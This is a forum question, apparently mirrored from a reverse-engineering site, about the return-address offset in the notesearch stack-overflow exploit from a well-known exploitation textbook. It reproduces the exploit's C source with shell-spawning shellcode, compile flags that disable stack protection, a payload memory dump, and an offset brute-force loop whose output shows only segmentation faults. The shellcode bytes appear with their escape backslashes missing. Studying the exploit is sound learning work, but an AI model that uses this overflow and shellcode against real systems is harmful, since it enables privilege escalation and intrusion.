Reverse Engineering Asked by E235 on December 23, 2020
I am reading the book "The Are Of Exploitation" 2nd Edition by Jon Erikson and there is something I don’t understand about the calculation of the return address.
In page 137 it covers the exploit of the notesearch program for the notesearch program.
This is the exploit (exploit_notesearch.c
):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"x31xc0x31xdbx31xc9x99xb0xa4xcdx80x6ax0bx58x51x68"
"x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x89xe2x53x89"
"xe1xcdx80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch '"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "'");
system(command); // run exploit
free(command);
}
I compiled the program and the exploit like that:
gcc -o notesearch -fstack-protector -g -O0 -std=c99 -fno-stack-protector notesearch.c
gcc -g exploit_notesearch.c
The exploit creates a command, filled with return address + 60*NOP and shellcode:
0x804a016: 0x90909090 0x90909090 0x90909090 0x90909090 --- 60 * NOPs
0x804a026: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a036: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a046: 0x90909090 0x90909090 0x90909090 0x3158466a --- The shellcode at 0x804a052
0x804a056: 0xcdc931db 0x2f685180 0x6868732f 0x6e69622f
0x804a066: 0x5351e389 0xb099e189 0xbf80cd0b 0xbffff6f6 --- The return address is 0xbffff6f6
0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
At the bottom of page 140 he explains how he calculated the address of the return address and why he chose the 270 offset.
I didn’t understand why.
He explained on page 142 that to find the offset he just run a loop and try some offsets.
He wrote:
Since the NOP sled is 60 bytes long, and we can return anywhere on the
sled, there is about 60 bytes of wiggle room. We can safely increment
the offset loop with a step of 30 with no danger of missing the sled.
But I don’t understand why he chose a step of 30, why the maximum is 300 and why 270 is the correct answer?
I ran the loop like he did and didn’t see anything special on all the offsets:
root@ubuntu:~/hacking/booksrc# for i in $(seq 0 30 300); do echo Trying offset $i; ./a.out $i; done
Trying offset 0
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 30
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 60
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 90
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 120
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 150
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 180
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 210
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 240
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 270
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Trying offset 300
[DEBUG] found a 34 byte note for user id 0
-------[ end of note data ]-------
Segmentation fault (core dumped)
Get help from others!
Recent Answers
Recent Questions
© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP